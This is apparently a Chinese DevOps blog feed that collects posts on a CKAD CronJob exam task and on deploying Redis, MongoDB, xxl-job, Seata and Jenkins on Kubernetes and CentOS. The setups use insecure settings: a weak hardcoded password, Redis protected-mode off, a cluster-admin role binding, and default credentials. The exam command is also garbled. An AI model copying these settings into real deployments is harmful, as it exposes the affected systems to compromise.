[candidate@node-1] $ kubectl config use-context k8s

Task

创建一个名为 ppi 并执行一个运行以下单一容器的 Pod 的 CronJob
- name: pi
image: perl:5
command: ["perl", " Mbignum=bpi", " wle", "print bpi(2000)"]
- CronJob配置为：
  - 每隔 5 分钟执行一次
  - 保留 2 个已完成的 Job
  - 保留 4 个失败的 Job
  - 永不重启 Pod
  - 在 8 秒后终止 Pod
为测试目的，从 CronJob ppi 中手动创建并执行一个名为 ppi-test 的 Job 。
- job完成与否不重要

参考

https://kubernetes.io/zh-cn/docs/tasks/job/automated-tasks-with-cron-jobs/https://kubernetes.io/zh-cn/docs/concepts/workloads/controllers/job/

kubectl explain cronjob.spec

cron 表示法 https://tool.lu/crontab/

CronJob-1-0
CronJob-1-1
CronJob-1-2
CronJob-1-3

解答

vim cronjob-1.yaml

---
apiVersion: batch/v1
kind: CronJob
metadata:
  name: ppi #修改为对应的
spec:
  schedule: "*/5 * * * *" #根据题目要求修改
  successfulJobsHistoryLimit: 2 # 成功记录次数
  failedJobsHistoryLimit: 4     # 失败记录次数
  jobTemplate:
    spec:
      activeDeadlineSeconds: 8  # pod存活时间
      template:
        spec:
          containers:
          - name: pi            # 名称
            image: perl:5       # 镜像
            imagePullPolicy: IfNotPresent
            command: ["perl", "Mbignum=bpi", " wle", "print bpi(2000)"] #题目命令
          restartPolicy: Never  # 重启策略

创建

kubectl apply -f cronjob-1.yaml

检查

kubectl get cronjobs

CronJob-1-4

手动触发 cronjob

kubectl create job ppi-test --from=cronjob/ppi

查看这个job

kubectl get jobs

CronJob-1-5

]]> kubernetes CKAD K8s Killer.sh CKAD k8s部署xxl-job /archives/kubernetes/sample/k8s-xxl-job.html 项目 docker地址

xuxueli/xxl-job-admin:2.2.0

k8s部署yaml文件

apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: default
  name: xxl-job-admin
spec:
  replicas: 1
  selector:
    matchLabels:
      app: xxl-job-admin
  template:
    metadata:
      labels:
        app: xxl-job-admin
    spec:
      containers:
      - name: xxl-job-admin
        image: xuxueli/xxl-job-admin:2.2.0
        imagePullPolicy: Always     # 优先使用本地镜像
        ports:
        - containerPort: 8080
        env:
        - name: PARAMS   # 定义变量，用来接收sql的用户/密码 mysql为k8s集群内的service名称，在k8s集群内部可以直接使用service名称，因为集群默认做了coredns解析
          value: "--spring.datasource.url=jdbc:mysql://MySQL地址:mysql端口/xxl_job?Unicode=true&characterEncoding=UTF-8&useSSL=false --spring.datasource.username=MySQL用户名 --spring.datasource.password=MySQL密码"

---
apiVersion: v1
kind: Service
metadata:
  labels:
    k8s.kuboard.cn/name: xxl-job-admin
  name: xxl-job-admin
  namespace: default
spec:
  ports:
    - name: xxl-job
      port: 8080
      protocol: TCP
      targetPort: 8080
  selector:
    app: xxl-job-admin
  type: ClusterIP

访问方式

java nacos中配置

xxl:
  job:
    admin:
      addresses: http://xxl-job-admin.default.svc:8080/xxl-job-admin   #xxl-job服务器地址
    executor:
      appname: shop-product    #注册到xxl-job服务器的应用名称
      port: 9990    #和定时任务调度中心通信的端口
      logpath: /data/appLogs/jobhandler   #定时任务调用的日志文件
      logretentiondays: 30 #日志文件保存的天数

]]> kubernetes sample xxl-job redis 压力测试 /archives/tools/redis-benchmark.html 普通测试

redis-benchmark -h 10.244.6.69 -p 6379 -n 1000000 -c 50 -t set,get,incr -q  -a a12345678

使用pipe管道批量提交测试

redis-benchmark -h 10.244.6.69 -p 6379 -n 1000000 -c 50 -t set,get,incr -q  -a a12345678 -P 10

测试随机key性能

redis-benchmark -h 10.244.6.69 -p 6379 -n 1000000 -c 50 -t set,get,incr -q  -a a12345678 -r 10

-n : 总请求数 -c : 线程数 -t : 请求类型 -q : 安静模式 -a : 密码 -P : 多少个请求一组

]]> tools redis-benchmark k8s部署redis集群3主3从 /archives/kubernetes/sample/k8s-redis-cluster.html 下面的yaml文件使用redis7构建一个3主3从的redis集群,使用openebs存储类做持久化, 2个步骤:

部署yaml, 创建出6副本有状态副本
初始化redis集群

部署yaml文件

kubectl apply -f redis-cluster.yaml

redis-cluster.yaml内容

---
apiVersion: v1
kind: Namespace
metadata:
  name: redis-cluster

---
apiVersion: v1
kind: ConfigMap
metadata:
  annotations: {}
  name: redis-cluster
  namespace: redis-cluster
data:
  fix-ip.sh: |
    #!/bin/sh
    CLUSTER_CONFIG="/data/nodes.conf"
    if [ -f ${CLUSTER_CONFIG} ]; then
      if [ -z "${POD_IP}" ]; then
        echo "Unable to determine Pod IP address!"
        exit 1
      fi
      echo "Updating my IP to ${POD_IP} in ${CLUSTER_CONFIG}"
      sed -i.bak -e '/myself/ s/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/'${POD_IP}'/' ${CLUSTER_CONFIG}
    fi
    exec "$@"
  redis.conf: |
    cluster-enabled yes
    cluster-config-file /data/nodes.conf
    cluster-node-timeout 10000
    protected-mode no
    daemonize no
    pidfile /var/run/redis.pid
    port 6379
    tcp-backlog 511
    bind 0.0.0.0
    timeout 3600
    tcp-keepalive 1
    loglevel verbose
    #logfile /data/redis.log
    databases 16
    save 900 1
    save 300 10
    save 60 10000
    stop-writes-on-bgsave-error yes
    rdbcompression yes
    rdbchecksum yes
    dbfilename dump.rdb
    dir /data
    requirepass a12345678
    appendonly yes
    appendfilename "appendonly.aof"
    appendfsync everysec
    no-appendfsync-on-rewrite no
    auto-aof-rewrite-percentage 100
    auto-aof-rewrite-min-size 64mb
    lua-time-limit 20000
    slowlog-log-slower-than 10000
    slowlog-max-len 128
    #rename-command FLUSHALL  ""
    latency-monitor-threshold 0
    notify-keyspace-events ""
    hash-max-ziplist-entries 512
    hash-max-ziplist-value 64
    list-max-ziplist-entries 512
    list-max-ziplist-value 64
    set-max-intset-entries 512
    zset-max-ziplist-entries 128
    zset-max-ziplist-value 64
    hll-sparse-max-bytes 3000
    activerehashing yes
    client-output-buffer-limit normal 0 0 0
    client-output-buffer-limit slave 256mb 64mb 60
    client-output-buffer-limit pubsub 32mb 8mb 60
    hz 10
    aof-rewrite-incremental-fsync yes

---
apiVersion: v1
kind: Service
metadata:
  namespace: redis-cluster
  name: redis-cluster
spec:
  clusterIP: None
  ports:
  - port: 6379
    targetPort: 6379
    name: client
  - port: 16379
    targetPort: 16379
    name: gossip
  selector:
    app: redis-cluster
    data: redis
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  namespace: redis-cluster
  name: redis-cluster
spec:
  serviceName: redis-cluster
  replicas: 6
  selector:
    matchLabels:
      app: redis-cluster
      data: redis
  template:
    metadata:
      labels:
        app: redis-cluster
        data: redis
    spec:
      containers:
      - name: redis
        image: redis:7.0-alpine
        ports:
        - containerPort: 6379
          name: client
        - containerPort: 16379
          name: gossip
        command: ["/etc/redis/fix-ip.sh", "redis-server", "/etc/redis/redis.conf"]
        env:
        - name: POD_IP
          valueFrom:
            fieldRef:
              fieldPath: status.podIP
        volumeMounts:
        - name: conf
          mountPath: /etc/redis/
          readOnly: false
        - name: redis-pv-claim
          mountPath: /data
          readOnly: false
      volumes:
      - name: conf
        configMap:
          name: redis-cluster
          defaultMode: 0755
  volumeClaimTemplates:
  - metadata:
      name: redis-pv-claim
    spec:
      accessModes:
        - ReadWriteOnce
      resources:
        requests:
          storage: 10Gi
      storageClassName: openebs-hostpath #改成自己的存储类

创建redis集群

#获取redis pod的IP
kubectl -n redis-cluster get pods -l data=redis -o jsonpath='{range.items[*]}{.status.podIP}:6379 '
#初始化redis集群
kubectl -n redis-cluster exec -it redis-cluster-0 -- redis-cli --cluster create --cluster-replicas 1 -a a12345678 \
   10.244.7.5:6379 10.244.6.5:6379 10.244.10.6:6379 10.244.9.7:6379 10.244.8.8:6379 10.244.5.54:6379
   #上面获取的IP:端口

]]> kubernetes sample redis k8s 部署redis哨兵1主2从 /archives/kubernetes/sample/k8s-redis-sentinel.html 一开始打算把启动脚本和配置文件放入configmap,直接使用一个yaml文件进行部署,但是实际操作中遇到个问题, 后续解决了,再使用单一yaml文件部署, 这里使用自定义镜像方式,来进行部署,以下是部署流程

制作redis镜像
也可以直接使用构建好的,”k9scc/base-env:redis-7-sentinel”
使用yaml文件,创建redis

制作redis镜像

Dockerfile

FROM redis:7
MAINTAINER "You"

COPY *.conf /opt/conf/
COPY run.sh /opt/run.sh
RUN apt update -y;apt-get install vim net-tools -y;apt-get clean && \
    chmod +x /opt/run.sh

CMD /opt/run.sh

run.sh

#!/bin/bash
pod_seq=$(echo $POD_NAME | awk -F"-" '{print $2}')
if [[ ${pod_seq} -ne 0 ]];then    #为从机
    sed -i '/^slaveof /d' /opt/conf/redis.conf
    echo "slaveof redis-0.redis.redis-cluster.svc.cluster.local 6379" >> /opt/conf/redis.conf   #redis-0.redis代表第一个redis的访问地址
fi
/usr/local/bin/redis-server /opt/conf/redis.conf
sleep 15    #如果redis-0没起来,它里面的哨兵也起不来，等待一段时间再启动哨兵
/usr/local/bin/redis-sentinel /opt/conf/sentinel.conf

redis.conf

#绑定到哪台机器，0.0.0.0表示允许所有主机访问
bind 0.0.0.0
#redis3.2版本之后加入的特性，yes开启后，如果没有配置bind则默认只允许127.0.0.1访问
protected-mode yes
#对外暴露的访问端口
port 6379
#登录密码
requirepass a12345678
#主从同步认证密码
masterauth a12345678
#三次握手的时候server端接收到客户端 ack确认号之后的队列值
tcp-backlog 511
#服务端与客户端连接超时时间，0表示永不超时
timeout 0
#连接redis的时候的密码 hello
#requirepass hello
#tcp 保持会话时间是300s
tcp-keepalive 300
#redis是否以守护进程运行，如果是，会生成pid
daemonize yes
supervised no
#pid文件路径
pidfile /var/run/redis_6379.pid
#日志级别
loglevel notice
#logfile /var/log/redis.log
#默认redis有几个db库
databases 16
#每间隔900秒，如果一个键值发生变化就触发快照机制
save 900 1
save 300 10
save 60 10000
#快照出错时，是否禁止redis写入
stop-writes-on-bgsave-error no
#持久化到rdb文件时，是否压缩文件
rdbcompression yes
#持久化到rdb文件是，是否RC64开启验证
rdbchecksum no
#持久化输出的时候，rdb文件命名
dbfilename dump.rdb
dir /data
#持久化文件路径
slave-serve-stale-data yes
slave-read-only yes
repl-diskless-sync no
repl-diskless-sync-delay 5
repl-disable-tcp-nodelay no
slave-priority 100
#是否开启aof备份
appendonly yes
#aof备份文件名称
appendfilename "appendonly.aof"
appendfsync everysec
no-appendfsync-on-rewrite no
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
aof-load-truncated yes
lua-time-limit 5000
slowlog-log-slower-than 10000
slowlog-max-len 128
latency-monitor-threshold 0
notify-keyspace-events ""
hash-max-ziplist-entries 512
hash-max-ziplist-value 64
list-max-ziplist-size -2
list-compress-depth 0
set-max-intset-entries 512
zset-max-ziplist-entries 128
zset-max-ziplist-value 64
hll-sparse-max-bytes 3000
activerehashing yes
client-output-buffer-limit normal 0 0 0
client-output-buffer-limit slave 256mb 64mb 60
client-output-buffer-limit pubsub 32mb 8mb 60
hz 10
aof-rewrite-incremental-fsync yes
#客户端最大连接数
#maxclients 20000
#lazyfree-lazy-eviction yes
#lazyfree-lazy-expire yes
#lazyfree-lazy-server-del yes
#slave-lazy-flush yes

sentinel.conf

# 哨兵sentinel实例运行的端口 默认26379
port 26379
# 哨兵sentinel的工作目录
dir "/tmp"
sentinel deny-scripts-reconfig yes
sentinel monitor mymaster redis-0.redis 6379 2
sentinel auth-pass mymaster a12345678
sentinel down-after-milliseconds mymaster 5000
sentinel failover-timeout mymaster 15000
# 设定5秒内没有响应，说明服务器挂了,需要将配置放在sentinel monitor master 127.0.0.1 6379 下面
sentinel parallel-syncs mymaster 2
# 设定15秒内master没有活起来，就重新选举主
sentinel config-epoch mymaster 3
#.表示如果master重新选出来后，其它slave节点能同时并行从新master同步缓存的台数有多少个，显然该值越大，所有slave节点完成同步切换的整体速度越快，但如
#果此时正好有人在访问这些slave，可能造#成读取失败，影响面会更广。最保定的设置为1，只同一时间，只能有一台干这件事，这样其它slave还能继续服务，但是所
#有slave全部完成缓存更新同步的进程将变慢。
sentinel leader-epoch mymaster 3
SENTINEL resolve-hostnames yes
SENTINEL announce-hostnames yes

构建redis镜像

我这边已经构建好, 也可以自己构建,

k9scc/base-env:redis-7-sentinel #redis密码a12345678

k8s-redis-sentinel-0

把Dockerfile, run.sh, redis.conf, sentinel.conf放在一个目录下,然后执行下面的命令

docker build -t docker用户名/项目名:tag .
docker push docker用户名/项目名:tag

k8s-redis-sentinel-1

k8s部署redis, 并使用存储类持久化存储

---
apiVersion: v1
kind: Namespace
metadata:
  name: redis-cluster
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: redis
  namespace: redis-cluster
spec:
  serviceName: redis
  selector:
    matchLabels:
      app: redis
  replicas: 3
  template:
    metadata:
      labels:
        app: redis
    spec:
      nodeSelector: {}
      restartPolicy: Always
      containers:
        - name: redis
          image: k9scc/base-env:redis-7-sentinel
          imagePullPolicy: Always
          env:
            - name: POD_NAME
              valueFrom:
                fieldRef:
                  fieldPath: metadata.name
          livenessProbe:
            tcpSocket:
              port: 6379
            initialDelaySeconds: 3
            periodSeconds: 5
          readinessProbe:
            tcpSocket:
              port: 6379
            initialDelaySeconds: 3
            periodSeconds: 5
          ports:
            - containerPort: 6379
          resources:
            requests:
              memory: 256Mi
              cpu: 50m
            limits:
              memory: 2048Mi
              cpu: 1000m
          volumeMounts:
          - name: redis-pv-claim
            mountPath: /data
            readOnly: false
  volumeClaimTemplates:
  - metadata:
      name: redis-pv-claim
    spec:
      accessModes:
        - ReadWriteOnce
      resources:
        requests:
          storage: 10Gi
      storageClassName: openebs-hostpath #修改为自己环境的存储类

---
apiVersion: v1
kind: Service
metadata:
  name: redis
  namespace: redis-cluster
spec:
  type: ClusterIP
  ports:
    - name: redis
      port: 6379
      targetPort: 6379
  selector:
    app: redis

连接

连接哨兵使用26379端口

java 连接redis哨兵配置

spring:
  redis:
    database: 4 #redis数据库
    sentinel:
      master: mymaster
      nodes: redis://redis-0.redis.redis-cluster.svc.cluster.local:26379,redis://redis-1.redis.redis-cluster.svc.cluster.local:26379,redis://redis-2.redis.redis-cluster.svc.cluster.local:26379
    password: a12345678 #redis密码

客户端连接redis, 使用podip + 6379端口

redis-cli 10.1.x.x -a a12345678

]]> kubernetes sample redis k8s 部署mongodb /archives/kubernetes/sample/k8s-mongodb.html 以下是一个k8s上部署mongodb的简单例子创建了一个mongodb的namespace, 创建了SA, clusterrole,名为mongo的服务, 名为mongo的3个有状态副本

mongo.yaml

# mongo.yaml
apiVersion: v1
kind: Namespace
metadata:
  name: mongodb
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: mongo
  namespace: mongodb
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: mongo
subjects:
  - kind: ServiceAccount
    name: mongo
    namespace: mongodb
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Service
metadata:
 name: mongo
 namespace: mongodb
 labels:
   name: mongo
spec:
 ports:
 - port: 27017
   targetPort: 27017
 clusterIP: None
 selector:
   role: mongo
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: mongo
  namespace: mongodb
spec:
  serviceName: mongo
  replicas: 3
  selector:
    matchLabels:
      role: mongo
      environment: staging
  template:
    metadata:
      labels:
        role: mongo
        environment: staging
        replicaset: MainRepSet
    spec:
      affinity:
        podAntiAffinity:  # 添加 Pod 反亲和性，将副本打散在不同的节点
          preferredDuringSchedulingIgnoredDuringExecution:  # 软策略
          - weight: 100
            podAffinityTerm:
              labelSelector:
                matchExpressions:
                - key: replicaset
                  operator: In
                  values:
                  - MainRepSet
              topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      serviceAccountName: mongo
      containers:
        - name: mongo
          image: mongo:4.4
          command:
            - mongod
            - "--wiredTigerCacheSizeGB"
            - "0.25"
            - "--bind_ip"
            - "0.0.0.0"
            - "--replSet"
            - MainRepSet
            #- "--smallfiles"
            #- "--noprealloc"
          ports:
            - containerPort: 27017
          volumeMounts:
            - name: mongo-data
              mountPath: /data/db
          resources:
            requests:
              cpu: 1
              memory: 2Gi
        - name: mongo-sidecar
          image: cvallance/mongo-k8s-sidecar
          env:
            - name: MONGO_SIDECAR_POD_LABELS
              value: "role=mongo,environment=staging"
            - name: KUBE_NAMESPACE
              value: "mongo"
            - name: KUBERNETES_MONGO_SERVICE_NAME
              value: "mongo"
  volumeClaimTemplates:
  - metadata:
      name: mongo-data
    spec:
      accessModes: [ "ReadWriteOnce" ]
      storageClassName: openebs-hostpath # 提供一个可用的 Storageclass
      resources:
        requests:
          storage: 30Gi

3个pod启动以后, 进入其中一个pod,然后执行集群创建命令

kubectl -n mongodb exec -it mongo-0 -- mongo

rs.status() #查看集群状态

#创建集群
config = { _id:"MainRepSet", members:[
                     {_id:0,host:"mongo-0.mongo.mongodb.svc.cluster.local:27017",priority:90},
                     {_id:1,host:"mongo-1.mongo.mongodb.svc.cluster.local:27017",priority:80},
                     {_id:2,host:"mongo-2.mongo.mongodb.svc.cluster.local:27017",priority:70}
    ]
}

rs.initiate(config);

rs.status() #查看集群状态

优化

set -o errexit
set -o pipefail
set -o nounset
echo 'never' > /sys/kernel/mm/transparent_hugepage/enabled
echo 'never' > /sys/kernel/mm/transparent_hugepage/defrag

设置或修改密码

#查看数据库
show dbs

#切换admin库
use admin

#创建管理员账户,用于管理账号，不能进行关闭数据库
db.createUser({ user: "admin", pwd: "password", roles: [{ role: "userAdminAnyDatabase", db: "admin" }] })

#创建root,超级管理员root,可关闭数据库
db.createUser({user: "root",pwd: "password", roles: [ { role: "root", db: "admin" } ]})

#创建用户自己的数据库的管理角色,一定要切换到所在数据库上去创建用户，不然创建的用户还是属于admin。
use yourdatabase
db.createUser({user: "user",pwd: "password",roles: [ { role: "dbOwner", db: "yourdatabase" } ]})

#查看用户
show users

#删库用户
use admin
db.auth("admin","password")

#删除单个用户
db.system.users.remove({user:"XXXXXX"})
#删除所有用户
db.system.users.remove({}

#连接字符串
mongodb://username:password@ip:port/database 
mongodb://username:password@ip0:port,ip1:port,ip2:port/database?replicaSet=MainRepSet

springboot 在nacos中的配置

mongodb:
  uri: mongodb://mongo-0.mongo.mongodb.svc.cluster.local:27017,mongo-1.mongo.mongodb.svc.cluster.local:27017,mongo-2.mongo.mongodb.svc.cluster.local:27017/database?replicaSet=MainRepSet
  auto-index-creation: true # 默认为false，即不会自动创建索引

]]> kubernetes sample mongodb Centos安装Jenkins和配置 /archives/tools/centos-install-Jenkins.html 安装Jenkins

添加源并安装

wget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.io/redhat/jenkins.repo
rpm --import https://pkg.jenkins.io/redhat/jenkins.io-2023.key

yum install fontconfig java-11-openjdk
yum install jenkins

Jenkins 下载加速

https://mirrors.tuna.tsinghua.edu.cn/jenkins/updates/update-center.json

如需修改请导航到: 系统管理 –> 插件管理 –> 高级设置 –> 升级站点

centos-install-Jenkins-0

默认地址是 https://updates.jenkins.io/update-center.json

Jenkins使用本机的docker

Jenkins运行使用Jenkins用户, 而docker组中么有Jenkins,导致Jenkins使用本地dockers无权限解决办法是, 把Jenkins用户添加到docker组中即可

#查看是否有dockers权限
sudo -u jenkins -H docker info
#添加Jenkins到docker组
usermod -aG docker jenkins
#查看是否有dockers权限
sudo -u jenkins -H docker info

pipeline

简单的pipeline

pipeline {
    agent {
        docker { 
            image '使用的image镜像地址'
        }
    }

    stages {
        stage('git project') {
            steps {
                git branch: 'main', credentialsId: 'gitlab-root # gitlab认证', url: 'git地址'
                sh 'ls -lsa'
            }
        }

        stage('build') {
            steps {
                sh 'mvn -v'
                sh 'mvn clean package "-Dmaven.test.skip=true" -Pprod'
            }
        }
    }
}

更新Jenkins

yum 直接更新 yum update
docker等运行的直接更新jar包即可

]]> tools Jenkins k8s 部署seata1.5.2(mysql+nacos+springboot) /archives/kubernetes/sample/k8s-seata1.5.2.html 本文使用的是nacos+mysql的方式大致流程:

MySQL建立对应的库和表
nacos配置对应的配置,以便java等应用能从nacos获取配置
k8s部署对应的负载,负载启动以后从配置文件获取nacos地址,然后从nacos获取配置启动

MySQL 建立库和表

# 创建一个数据库
CREATE DATABASE `seata`;

然后进入数据库中执行建表查询

use seata;

CREATE TABLE IF NOT EXISTS `global_table`
(
    `xid`                       VARCHAR(128) NOT NULL,
    `transaction_id`            BIGINT,
    `status`                    TINYINT      NOT NULL,
    `application_id`            VARCHAR(32),
    `transaction_service_group` VARCHAR(32),
    `transaction_name`          VARCHAR(128),
    `timeout`                   INT,
    `begin_time`                BIGINT,
    `application_data`          VARCHAR(2000),
    `gmt_create`                DATETIME,
    `gmt_modified`              DATETIME,
    PRIMARY KEY (`xid`),
    KEY `idx_status_gmt_modified` (`status` , `gmt_modified`),
    KEY `idx_transaction_id` (`transaction_id`)
) ENGINE = InnoDB
  DEFAULT CHARSET = utf8mb4;

-- the table to store BranchSession data
CREATE TABLE IF NOT EXISTS `branch_table`
(
    `branch_id`         BIGINT       NOT NULL,
    `xid`               VARCHAR(128) NOT NULL,
    `transaction_id`    BIGINT,
    `resource_group_id` VARCHAR(32),
    `resource_id`       VARCHAR(256),
    `branch_type`       VARCHAR(8),
    `status`            TINYINT,
    `client_id`         VARCHAR(64),
    `application_data`  VARCHAR(2000),
    `gmt_create`        DATETIME(6),
    `gmt_modified`      DATETIME(6),
    PRIMARY KEY (`branch_id`),
    KEY `idx_xid` (`xid`)
) ENGINE = InnoDB
  DEFAULT CHARSET = utf8mb4;

-- the table to store lock data
CREATE TABLE IF NOT EXISTS `lock_table`
(
    `row_key`        VARCHAR(128) NOT NULL,
    `xid`            VARCHAR(128),
    `transaction_id` BIGINT,
    `branch_id`      BIGINT       NOT NULL,
    `resource_id`    VARCHAR(256),
    `table_name`     VARCHAR(32),
    `pk`             VARCHAR(36),
    `status`         TINYINT      NOT NULL DEFAULT '0' COMMENT '0:locked ,1:rollbacking',
    `gmt_create`     DATETIME,
    `gmt_modified`   DATETIME,
    PRIMARY KEY (`row_key`),
    KEY `idx_status` (`status`),
    KEY `idx_branch_id` (`branch_id`),
    KEY `idx_xid` (`xid`)
) ENGINE = InnoDB
  DEFAULT CHARSET = utf8mb4;

CREATE TABLE IF NOT EXISTS `distributed_lock`
(
    `lock_key`       CHAR(20) NOT NULL,
    `lock_value`     VARCHAR(20) NOT NULL,
    `expire`         BIGINT,
    primary key (`lock_key`)
) ENGINE = InnoDB
  DEFAULT CHARSET = utf8mb4;

INSERT INTO `distributed_lock` (lock_key, lock_value, expire) VALUES ('AsyncCommitting', ' ', 0);
INSERT INTO `distributed_lock` (lock_key, lock_value, expire) VALUES ('RetryCommitting', ' ', 0);
INSERT INTO `distributed_lock` (lock_key, lock_value, expire) VALUES ('RetryRollbacking', ' ', 0);
INSERT INTO `distributed_lock` (lock_key, lock_value, expire) VALUES ('TxTimeoutCheck', ' ', 0);

配置nacos配置文件

在nacos对应的namespace中创建一个配置文件

seataServer.properties

k8s-seata1.5.2-0

内容如下

#For details about configuration items, see https://seata.io/zh-cn/docs/user/configurations.html
#Transport configuration, for client and server
transport.type=TCP
transport.server=NIO
transport.heartbeat=true
transport.enableTmClientBatchSendRequest=false
transport.enableRmClientBatchSendRequest=true
transport.enableTcServerBatchSendResponse=false
transport.rpcRmRequestTimeout=30000
transport.rpcTmRequestTimeout=30000
transport.rpcTcRequestTimeout=30000
transport.threadFactory.bossThreadPrefix=NettyBoss
transport.threadFactory.workerThreadPrefix=NettyServerNIOWorker
transport.threadFactory.serverExecutorThreadPrefix=NettyServerBizHandler
transport.threadFactory.shareBossWorker=false
transport.threadFactory.clientSelectorThreadPrefix=NettyClientSelector
transport.threadFactory.clientSelectorThreadSize=1
transport.threadFactory.clientWorkerThreadPrefix=NettyClientWorkerThread
transport.threadFactory.bossThreadSize=1
transport.threadFactory.workerThreadSize=default
transport.shutdown.wait=3
transport.serialization=seata
transport.compressor=none

#Transaction routing rules configuration, only for the client
service.vgroupMapping.default_tx_group=default #这里需要和seata里面的对应
#If you use a registry, you can ignore it
service.default.grouplist=seata.namespace.svc:8091 # 这里填写k8s中seata对应的 服务名:端口 ,格式为 server名.namespace名.svc:端口
service.enableDegrade=false
service.disableGlobalTransaction=false

#Transaction rule configuration, only for the client
client.rm.asyncCommitBufferLimit=10000
client.rm.lock.retryInterval=10
client.rm.lock.retryTimes=30
client.rm.lock.retryPolicyBranchRollbackOnConflict=true
client.rm.reportRetryCount=5
client.rm.tableMetaCheckEnable=true
client.rm.tableMetaCheckerInterval=60000
client.rm.sqlParserType=druid
client.rm.reportSuccessEnable=false
client.rm.sagaBranchRegisterEnable=false
client.rm.sagaJsonParser=fastjson
client.rm.tccActionInterceptorOrder=-2147482648
client.tm.commitRetryCount=5
client.tm.rollbackRetryCount=5
client.tm.defaultGlobalTransactionTimeout=60000
client.tm.degradeCheck=false
client.tm.degradeCheckAllowTimes=10
client.tm.degradeCheckPeriod=2000
client.tm.interceptorOrder=-2147482648
client.undo.dataValidation=true
client.undo.logSerialization=jackson
client.undo.onlyCareUpdateColumns=true
server.undo.logSaveDays=7
server.undo.logDeletePeriod=86400000
client.undo.logTable=undo_log
client.undo.compress.enable=true
client.undo.compress.type=zip
client.undo.compress.threshold=64k
#For TCC transaction mode
tcc.fence.logTableName=tcc_fence_log
tcc.fence.cleanPeriod=1h

#Log rule configuration, for client and server
log.exceptionRate=100

#Transaction storage configuration, only for the server. The file, DB, and redis configuration values are optional.
store.mode=db

#These configurations are required if the `store mode` is `db`. If `store.mode,store.lock.mode,store.session.mode` are not equal to `db`, you can remove the configuration block.
store.db.datasource=druid
store.db.dbType=mysql
store.db.driverClassName=com.mysql.cj.jdbc.Driver
store.db.url=jdbc:mysql://MySQL地址:端口默认3306/seata?serverTimezone=Asia/Shanghai&useSSL=false&useUnicode=true&characterEncoding=utf8&autoReconnect=true&failOverReadOnly=false&userAffectedRows=true
store.db.user=root #数据库用户名
store.db.password=******* #数据库密码
store.db.minConn=5
store.db.maxConn=30
store.db.globalTable=global_table
store.db.branchTable=branch_table
store.db.distributedLockTable=distributed_lock
store.db.queryLimit=100
store.db.lockTable=lock_table
store.db.maxWait=5000

#Transaction rule configuration, only for the server
server.recovery.committingRetryPeriod=1000
server.recovery.asynCommittingRetryPeriod=1000
server.recovery.rollbackingRetryPeriod=1000
server.recovery.timeoutRetryPeriod=1000
server.maxCommitRetryTimeout=-1
server.maxRollbackRetryTimeout=-1
server.rollbackRetryTimeoutUnlockEnable=false
server.distributedLockExpireTime=10000
server.xaerNotaRetryTimeout=60000
server.session.branchAsyncQueueSize=5000
server.session.enableBranchAsyncRemove=false
server.enableParallelRequestHandle=false

#Metrics configuration, only for the server
metrics.enabled=false
metrics.registryType=compact
metrics.exporterList=prometheus
metrics.exporterPrometheusPort=9898

k8s创建工作负载

seata 1.5.2 部署 yaml

---
apiVersion: v1
kind: Service
metadata:
  name: seata
  namespace: default
  labels:
    app.kubernetes.io/name: seata
spec:
  type: ClusterIP
  ports:
    - port: 8091
      protocol: TCP
      name: http
  selector:
    app.kubernetes.io/name: seata

---
apiVersion: v1
kind: ConfigMap
metadata:
  name: seata-config
  namespace: default
data:
  application.yml: |
    server:
      port: 7091
    spring:
      application:
        name: seata-server #注册到nacos时的服务名
    # 日志配置
    logging:
      config: classpath:logback-spring.xml
      file:
        path: /root/logs/seata
    # 新增加的console控制台，
    # 可通过访问http://localhost:7091进行登录，账号如下seata/seata
    console:
      user: 
        username: seata
        password: seata
    seata:
      # Seata接入Nacos配置中心
      config:
        # support: file, nacos, consul, apollo, zk, etcd3
        type: nacos
        nacos:
          server-addr: nacos.default.svc:8848 #改成对应的地址
          namespace: default    #改成对应的空间
          group: DEFAULT_GROUP 
          username: nacos #对应的用户名
          password: nacos #nacos密码
          # 该data-id需要在nacos中进行配置
          data-id: seataServer.properties #nacos中配置文件名
      # Seata接入Nacos服务注册中心
      registry:
        # support: file, nacos, eureka, redis, zk, consul, etcd3, sofa
        type: nacos
        nacos:
          application: seata-server
          server-addr: nacos.default.svc:8848 #改成对应的地址
          group: DEFAULT_GROUP
          namespace: default #改成对应的空间
          cluster: default #这里需要和nacos中的一致
          username: nacos
          password: nacos #nacos密码

      security:
        secretKey: SeataSecretKey0c382ef121d778043159209298fd40bf3850a017
        tokenValidityInMilliseconds: 1800000
        ignore:
          urls: /,/**/*.css,/**/*.js,/**/*.html,/**/*.map,/**/*.svg,/**/*.png,/**/*.ico,/console-fe/public/**,/api/v1/auth/login

---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: seata
  namespace: default
  labels:
    app.kubernetes.io/name: seata
spec:
  replicas: 1
  selector:
    matchLabels:
      app.kubernetes.io/name: seata
  template:
    metadata:
      labels:
        app.kubernetes.io/name: seata
    spec:
      containers:
        - name: seata
          image: docker.io/seataio/seata-server:1.5.2
          imagePullPolicy: IfNotPresent
          env:
            - name: SEATA_PORT
              value: '8091'
          ports:
            - name: http
              containerPort: 8091
              protocol: TCP
          volumeMounts:
            - mountPath: /seata-server/resources/application.yml
              name: seata-config
              subPath: application.yml
      volumes:
        - configMap:
            defaultMode: 420
            items:
              - key: application.yml
                path: application.yml
            name: seata-config
          name: seata-config

如图说明启动成功

k8s-seata1.5.2-1

查看服务地址

k8s-seata1.5.2-2

使用默认的用户名密码 seata/seata登陆

k8s-seata1.5.2-3
k8s-seata1.5.2-4

]]> kubernetes sample seata 创建Nessus的Docker镜像 / 一键部署Nessus /archives/docker/Nessus-images.html Nessus支持很多种环境, docker vm 主机 aws等等, 这里主要介绍两种:

自己构建docker镜像, 也可以使用官网的,
使用一键脚本, 文章末尾提供一键脚本

参考: https://www.iculture.cc/software/pig=25546

